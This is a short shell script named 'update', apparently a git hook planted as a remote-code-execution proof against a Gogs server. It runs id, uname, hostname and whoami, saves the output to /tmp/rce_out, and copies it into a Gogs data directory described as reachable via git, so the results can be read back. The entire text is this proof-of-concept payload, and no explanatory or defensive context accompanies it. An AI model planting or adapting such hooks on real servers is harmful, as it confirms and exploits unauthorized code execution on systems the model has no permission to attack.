update 245 B

1234567
  1. #!/bin/sh
  2. id > /tmp/rce_out 2>&1
  3. uname -a >> /tmp/rce_out 2>&1
  4. hostname >> /tmp/rce_out 2>&1
  5. whoami >> /tmp/rce_out 2>&1
  6. # Also write to a path reachable via git
  7. cp /tmp/rce_out /data/gogs/data/tmp/local-r/27/rce_proof.txt 2>/dev/null || true